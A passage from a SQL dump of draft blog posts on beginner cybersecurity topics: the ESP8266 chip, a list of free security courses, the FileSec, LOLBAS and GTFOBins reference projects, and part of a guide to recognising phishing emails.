[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Challenges and Considerations</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While the ESP8266 offers exciting possibilities for IoT and cybersecurity, it’s important to note its limitations:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Limited Processing Power</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Complex security analysis may exceed the chip’s capabilities, making it best suited for basic tasks or as part of a larger system.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Security Concerns</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 itself must be secured to prevent unauthorized access. Use strong passwords, update the firmware regularly, and avoid connecting it to untrusted networks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Despite its limitations, the ESP8266 remains a valuable tool for learning, experimenting, and building cost-effective solutions.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of ESP8266 in Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266’s affordability and functionality have opened doors to innovative applications in cybersecurity. Whether used for network monitoring, ethical hacking, or IoT device testing, this tiny chip proves that impactful tools don’t always require a big budget.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By leveraging the ESP8266 responsibly, businesses and individuals alike can strengthen their understanding of Wi-Fi networks and identify potential vulnerabilities.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 exemplifies how a low-cost component can offer immense value not just in IoT but also in cybersecurity. From intrusion detection systems to honeypots and ethical hacking tools like the ESP8266 Deauther, its versatility is unmatched.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you ready to explore the potential of the ESP8266? Whether you’re building the next big IoT project or seeking to enhance network security knowledge, this tiny chip is the perfect starting point. Happy tinkering!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:39:20', '2026-01-12 21:41:44', 'Information Security', 'ESP8266: A Tiny WiFi Chip Powering Big IoT and Cybersecurity Innovations', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(130, 'Free Cybersecurity Courses: Save Thousands and Boost Your Career!', 'free-cybersecurity-courses-save-thousands-and-boost-your-career', 'Presenting a list of <strong>FREE cybersecurity courses</strong> just for you! 💻 Seize this incredible opportunity to save thousands of dollars while gaining valuable skills. Bookmark this page and dive into my curated curriculum to get ahead in your cybersecurity career.\r\n<h3>Why Learn Cybersecurity?</h3>\r\nCybersecurity is an ever-evolving field with immense opportunities. Whether you\'re a beginner or looking to sharpen your skills, these free courses offer comprehensive learning experiences to help you stay ahead of the curve.\r\n<h3>What You\'ll Get</h3>\r\n<ul>\r\n 	<li><strong>29 free lessons</strong> to get you interview-ready and ahead of 90% of people.</li>\r\n 	<li><strong>Top-notch tutorials</strong> and certifications to turbocharge your skillset.</li>\r\n</ul>\r\n<h3>Beginner Courses</h3>\r\n🔐 <strong><a href=\"https://www.netacad.com/courses/cybersecurity/introduction-cybersecurity\" target=\"_new\" rel=\"noreferrer noopener\">Introduction to Cybersecurity</a></strong>\r\nA beginner-friendly course to understand the essentials of cybersecurity.\r\n\r\n🔐 <strong><a href=\"https://www.udacity.com/course/intro-to-cybersecurity-nanodegree--nd545\" target=\"_new\" rel=\"noreferrer noopener\">Intro to Information Security by Udacity</a></strong>\r\nA comprehensive introduction to the basics of information security.\r\n\r\n🔐 <strong><a href=\"https://www.netacad.com/courses/networking/networking-essentials\" target=\"_new\" rel=\"noreferrer noopener\">Networking Essentials</a></strong>\r\nFundamental networking skills critical for cybersecurity.\r\n\r\n🔐 <strong><a href=\"https://www.netacad.com/courses/cybersecurity/cybersecurity-essentials\" target=\"_new\" rel=\"noreferrer noopener\">Cybersecurity Essentials</a></strong>\r\nDive deeper into the key concepts and practices in cybersecurity.\r\n\r\n🔐 <strong><a href=\"https://training.fortinet.com/\" target=\"_new\" rel=\"noreferrer noopener\">NSE 1, 2 &amp; 3 by Fortinet</a></strong>\r\nGain certifications that cover basic to advanced network security.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/network-defense-essentials\" target=\"_new\" rel=\"noreferrer noopener\">Network Defense Essentials (NDE) by EC-Council</a></strong>\r\nLearn the basics of network defense.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/ethical-hacking-essentials?logged=false\" target=\"_new\" rel=\"noreferrer noopener\">Ethical Hacking Essentials (EHE) by EC-Council</a></strong>\r\nGet started with ethical hacking principles and techniques.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/digital-forensics-essentials?logged=false\" target=\"_new\" rel=\"noreferrer noopener\">Digital Forensics Essentials (DFE) by EC-Council</a></strong>\r\nLearn the fundamentals of digital forensics.\r\n\r\n🔐 <strong><a href=\"https://www.open.edu/openlearn/science-maths-technology/information-security?active-tab=description-tab\" target=\"_new\" rel=\"noreferrer noopener\">Information Security by OpenLearn</a></strong>\r\nExplore the broad aspects of information security through this course.\r\n\r\n🔐 <strong><a href=\"https://www.open.edu/openlearn/digital-computing/network-security?active-tab=description-tab\" target=\"_new\" rel=\"noreferrer noopener\">Network Security by OpenLearn</a></strong>\r\nLearn about protecting data and networks from threats.\r\n\r\n🔐 <strong><a href=\"https://www.open.edu/openlearn/money-business/risk-management?active-tab=description-tab\" target=\"_new\" rel=\"noreferrer noopener\">Risk Management by OpenLearn</a></strong>\r\nUnderstand how to identify and manage cybersecurity risks.\r\n\r\n🔐 <strong><a href=\"https://www.isc2.org/Certifications/CC\" target=\"_new\" rel=\"noreferrer noopener\">Certified in Cybersecurity℠ - CC by (ISC)²</a></strong>\r\nAchieve certification to validate your cybersecurity skills.\r\n<h3>Intermediate Courses</h3>\r\n🔐 <strong><a href=\"https://www.udacity.com/course/infrastructure-and-network-security-architecture-planning-and-design--cd0396\" target=\"_new\" rel=\"noreferrer noopener\">Network Security by Udacity</a></strong>\r\nLearn the fundamentals of network security, including architecture, planning, and design.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/android-bug-bounty-hunting-hunt-like-a-rat?logged=false\" target=\"_new\" rel=\"noreferrer noopener\">Android Bug Bounty Hunting: Hunt Like a Rat</a></strong>\r\nMaster techniques for finding vulnerabilities in Android applications.\r\n\r\n🔐 <strong><a href=\"https://portswigger.net/web-security\" target=\"_new\" rel=\"noreferrer noopener\">PortSwigger Web Hacking</a></strong>\r\nLearn web application security and penetration testing.\r\n\r\n🔐 <strong><a href=\"https://www.qualys.com/training/\" target=\"_new\" rel=\"noreferrer noopener\">Vulnerability Management by Qualys</a></strong>\r\nLearn about identifying and managing vulnerabilities.\r\n\r\n🔐 <strong><a href=\"https://www.classcentral.com/course/software-security-1728\" target=\"_new\" rel=\"noreferrer noopener\">Software Security by Class Central</a></strong>\r\nUnderstand the principles of building secure software.\r\n\r\n🔐 <strong><a href=\"https://training.linuxfoundation.org/training/developing-secure-software-lfd121/\" target=\"_new\" rel=\"noreferrer noopener\">Developing Secure Software by Linux Foundation</a></strong>\r\nAdvanced course on secure software development practices.\r\n\r\n🔐 <strong><a href=\"https://explore.skillbuilder.aws/learn/signin\" target=\"_new\" rel=\"noreferrer noopener\">AWS Cloud Certifications (Cybersecurity)</a></strong>\r\nCertification courses focused on AWS cloud security.\r\n\r\n🔐 <strong><a href=\"https://learn.microsoft.com/en-us/training/azure/\" target=\"_new\" rel=\"noreferrer noopener\">Microsoft Learn for Azure</a></strong>\r\nLearn to secure and manage Microsoft\'s cloud platform, Azure.\r\n\r\n🔐 <strong><a href=\"https://cloud.google.com/learn/training\" target=\"_new\" rel=\"noreferrer noopener\">Google Cloud Training</a></strong>\r\nDevelop skills in securing and managing Google Cloud services.\r\n\r\n🔐 <strong><a href=\"https://www.splunk.com/en_us/training/free-courses/overview.html\" target=\"_new\" rel=\"noreferrer noopener\">Splunk Free Courses</a></strong>\r\nCourses on using Splunk for security and operational intelligence.\r\n<h3>Advanced Courses</h3>\r\n🔐 <strong><a href=\"https://www.open.edu/openlearn/science-maths-technology/digital-forensics?active-tab=description-tab\" target=\"_new\" rel=\"noreferrer noopener\">Digital Forensics by OpenLearn</a></strong>\r\nStudy digital forensics and how to handle digital evidence.\r\n\r\n🔐 <strong><a href=\"https://codered.eccouncil.org/course/introduction-to-dark-web-anonymity-and-cryptocurrency?logged=false\" target=\"_new\" rel=\"noreferrer noopener\">Dark Web, Anonymity, and Cryptocurrency by EC-Council</a></strong>\r\nUnderstand the dark web and the role of anonymity and cryptocurrency.\r\n\r\n🔐 <strong><a href=\"https://taggartinstitute.org/p/responsible-red-teaming\" target=\"_new\" rel=\"noreferrer noopener\">RedTeaming by Taggart Institute</a></strong>\r\nGain skills in red teaming and adversary simulation.\r\n\r\n🔐 <strong><a href=\"https://digitaldefynd.com/best-network-security-courses/?redirccnasecurity/\" target=\"_new\" rel=\"noreferrer noopener\">CCNA Security Courses</a></strong>\r\nComprehensive training on network security, aligned with the CCNA certification.\r\n\r\n🔐 <strong><a href=\"https://training.linuxfoundation.org/training/developing-secure-software-lfd121/\" target=\"_new\" rel=\"noreferrer noopener\">Secure Software Development by Linux Foundation</a></strong>\r\nIn-depth look at practices for secure software development.\r\n\r\n🔐 <strong><a href=\"https://www.classcentral.com/course/software-security-1728\" target=\"_new\" rel=\"noreferrer noopener\">Maryland Software Security</a></strong>\r\nComprehensive course on software security principles.\r\n\r\n<hr />\r\n\r\nEager to start your cybersecurity journey? Dive into these courses now and elevate your career! Happy learning!', '', NULL, NULL, 1, 'draft', '2024-08-01 02:36:32', '2026-01-12 21:41:44', 'Information Security', 'Free Cybersecurity Courses: Save Thousands and Boost Your Career!', '', NULL),
(131, 'Three Powerful Projects to Enhance Your Malware Analysis Skills', 'three-powerful-projects-to-enhance-your-malware-analysis-skills', '<div class=\"feed-shared-update-v2__description-wrapper\">\r\n<div class=\"feed-shared-inline-show-more-text feed-shared-update-v2__description feed-shared-inline-show-more-text--minimal-padding feed-shared-inline-show-more-text--expanded \">\r\n<div class=\"update-components-text relative feed-shared-update-v2__commentary \" dir=\"ltr\">\r\n<h2 class=\"\" data-sourcepos=\"1:1-1:79\">Deep Dive: Three Projects to Supercharge Your Malware Analysis Skills <strong>✨</strong></h2>\r\n<p data-sourcepos=\"3:1-3:90\">Malware analysis is an intricate art in the cybersecurity world. It demands the ability to dissect malicious software, comprehend its inner workings, and develop effective defenses. This blog post dives deep into three exceptional projects that can significantly elevate your malware analysis expertise.</p>\r\n<p data-sourcepos=\"5:1-5:76\"><strong>Project 1: <a href=\"https://filesec.io\">FileSec.io</a> - Unmasking the Malicious Disguise of File Extensions</strong></p>\r\n<p data-sourcepos=\"7:1-7:67\">File extensions play a critical role in how our computers interpret files. However, attackers can exploit these extensions for malicious purposes like phishing scams, executing malicious code, and launching macro-based attacks. This is where FileSec steps in as your hero!</p>\r\n<p data-sourcepos=\"9:1-9:274\">FileSec is a comprehensive and meticulously curated list that details file extensions commonly misused for malicious activities. By understanding these extensions and their potential dangers, you gain a significant advantage in fortifying your defenses against such attacks.</p>\r\n<p data-sourcepos=\"11:1-11:31\"><strong>Here\'s what FileSec offers:</strong></p>\r\n\r\n<ul data-sourcepos=\"13:1-14:89\">\r\n 	<li data-sourcepos=\"13:1-13:108\"><strong>Extensive list:</strong> It catalogs a wide range of file extensions that can be abused for malicious purposes.</li>\r\n 	<li data-sourcepos=\"14:1-14:89\"><strong>Detailed explanations:</strong> It provides insights into how each extension can be misused, giving you a deeper understanding of the attacker\'s tactics.</li>\r\n 	<li data-sourcepos=\"15:1-16:0\"><strong>Improved detection capabilities:</strong> By recognizing these red flags, you can become more adept at identifying and blocking potentially malicious files.</li>\r\n</ul>\r\n<p data-sourcepos=\"19:1-19:87\"><strong>Project 2: Windows LOLBins - Unveiling the Stealthy \"Living Off the Land\" Attackers (https://lolbas-project.github.io/</strong><strong>)</strong></p>\r\n<p data-sourcepos=\"21:1-21:479\">LOLBins, an abbreviation for Living Off the Land Binaries, represent a cunning tactic employed by attackers. They leverage legitimate, pre-existing binaries (programs) already present on a system to achieve their malicious goals. This makes their activity appear more benign, potentially bypassing security measures. The Windows LOLBins project acts as a decoder ring, providing valuable insights into these legitimate binaries and how attackers can manipulate them for nefarious purposes.</p>\r\n<p data-sourcepos=\"23:1-23:49\"><strong>Why understanding Windows LOLBins is crucial:</strong></p>\r\n\r\n<ul data-sourcepos=\"25:1-28:0\">\r\n 	<li data-sourcepos=\"25:1-25:167\"><strong>Enhanced detection:</strong> By knowing how attackers can manipulate these binaries, you can better identify suspicious activity that might otherwise fly under the radar.</li>\r\n 	<li data-sourcepos=\"26:1-26:163\"><strong>Improved mitigation strategies:</strong> Understanding the functionalities abused by attackers allows you to develop more effective methods to mitigate these attacks.</li>\r\n 	<li data-sourcepos=\"27:1-28:0\"><strong>Staying ahead of the curve:</strong> Attackers are constantly evolving their tactics. Knowledge of LOLBins helps you anticipate and prepare for potential threats.</li>\r\n</ul>\r\n&nbsp;\r\n<p data-sourcepos=\"34:1-34:79\"><strong>Project 3: GTFOBins - Mastering the Dark Side of Legitimate Linux Functions</strong></p>\r\n<p data-sourcepos=\"36:1-36:18\">Similar to LOLBins, the GTFOBins project focuses on the realm of Linux. It delves into legitimate functions within various Unix binaries that attackers can exploit. These functions can be abused for a variety of malicious activities, including:</p>\r\n\r\n<ul data-sourcepos=\"38:1-41:0\">\r\n 	<li data-sourcepos=\"38:1-38:85\"><strong>Privilege Escalation:</strong> Gaining unauthorized administrative access on the system.</li>\r\n 	<li data-sourcepos=\"39:1-39:61\"><strong>File Transfer:</strong> Uploading or downloading sensitive data.</li>\r\n 	<li data-sourcepos=\"40:1-41:0\"><strong>Remote Access Shells:</strong> Establishing a connection to the system for further exploitation.</li>\r\n</ul>\r\n<p data-sourcepos=\"42:1-42:150\">By understanding how attackers can misuse these functionalities, you can become more adept at detecting and thwarting their attempts on Linux systems.</p>\r\n<p data-sourcepos=\"44:1-44:37\"><strong>Why GTFOBins is a valuable asset:</strong></p>\r\n\r\n<ul data-sourcepos=\"46:1-48:0\">\r\n 	<li data-sourcepos=\"46:1-46:169\"><strong>Proactive Defense:</strong> By learning about these vulnerabilities, you can implement measures to harden your Linux systems and make them less susceptible to exploitation.</li>\r\n 	<li data-sourcepos=\"47:1-48:0\"><strong>Improved Incident Response:</strong> If a Linux system is compromised, knowledge of GTFOBins can help you identify the specific functions attackers might have abused, leading to a faster and more effective response.</li>\r\n</ul>\r\n<p data-sourcepos=\"51:1-51:445\">These three projects offer a treasure trove of resources for anyone working in malware analysis. FileSec equips you with knowledge about malicious file extensions. Windows LOLBins and GTFOBins shed light on how attackers can manipulate legitimate programs for their advantage. By incorporating these resources into your malware analysis workflow, you can significantly enhance your ability to identify, understand, and combat malicious software.</p>\r\n\r\n</div>\r\n</div>\r\n</div>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:35:10', '2026-01-12 21:41:44', 'Information Security', 'Three Powerful Projects to Enhance Your Malware Analysis Skills', '', NULL),
(132, 'How to Recognize and Avoid Phishing Emails to Stay Secure', 'how-to-recognize-and-avoid-phishing-emails-to-stay-secure', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks are one of the most common tactics cybercriminals use to access sensitive information, such as login credentials, credit card numbers, and personal data. Falling victim to one of these scams can result in financial loss, identity theft, or security breaches. This blog will guide you through understanding phishing emails and provide actionable tips on how to detect and avoid them.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Identifying Phishing Emails is Crucial</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails are designed to look like legitimate correspondence from trusted institutions, such as banks, government agencies, or reputable companies. This deceptive appearance makes them hard to spot. If a recipient provides sensitive information, attackers can:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Steal money directly from bank accounts,</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use personal information to open credit lines,</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Access personal accounts such as emails, e-commerce platforms, or work systems.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding how to identify phishing attempts is a key step in protecting your personal and professional security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Ways to Recognize a Phishing Email</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Check for a Suspicious Sender</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails often use fake email addresses that closely resemble legitimate ones. However, slight variations can give them away.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Example</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Fake email address: `support@go0gle.com`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Legitimate email address: `support@google.com`</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to Spot It</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Hover over the sender\'s name to reveal the full email address.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Compare the sender\'s email to the official address of the company.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tools to Investigate Senders</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hunter.io</strong></b> or <b><strong class=\"font-bold\">Maltego</strong></b> can verify if the email address is authentic or linked to phishing activities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Beware of Urgent Language</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails often create a sense of panic to prompt immediate action. Urgent messages like these are a common red flag:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">“Your account has been compromised! Reset your password immediately!”</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">“Respond within 24 hours to avoid account suspension!”</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate companies rarely use dramatic or urgent language. They will also never ask for sensitive information via email.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Look for Generic Greetings</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails often lack personalization. Instead of addressing you by name, they might use generic terms such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">\"Dear valued member,\"</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">\"Dear customer,\"</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate emails from trusted companies typically address you by your full name.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Inspect Suspicious Links</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails often include deceptive links designed to take users to fraudulent sites that collect their data.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to Verify Links</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Hover over any link in the email to see the full URL.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Ensure the URL matches the official website of the organization. For example, a legitimate Google link should look like `https://accounts.google.com`, not `http://go0gle.acdf.xyz`.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Helpful Tools</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use platforms like <b><strong class=\"font-bold\">VirusTotal</strong></b> or <b><strong class=\"font-bold\">URLScan</strong></b> to analyze suspicious links for safety.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Watch for Poor Grammar and Spelling</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails may contain spelling errors, unusual phrasing, or awkward grammar since many are created quickly or by non-native speakers.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Example of Poor Grammar</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">“Your acount has been Temporary suspend, please login to reactivate it immediately.”</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate companies ensure professional communication free from grammar and spelling mistakes.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Avoid Emails with Unusual Requests</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercriminals often ask for highly sensitive information, such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Social Security numbers,</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Full login credentials,</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Bank account or credit card details.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate organizations will never request sensitive information through unsolicited emails.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Recommended Tools</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use tools like <b><strong class=\"font-bold\">Have I Been Pwned</strong></b> or <b><strong class=\"font-bold\">DeHashed</strong></b> to check if your email address has been exposed in data breaches.</li>\r\n</ul>\r\n<h3 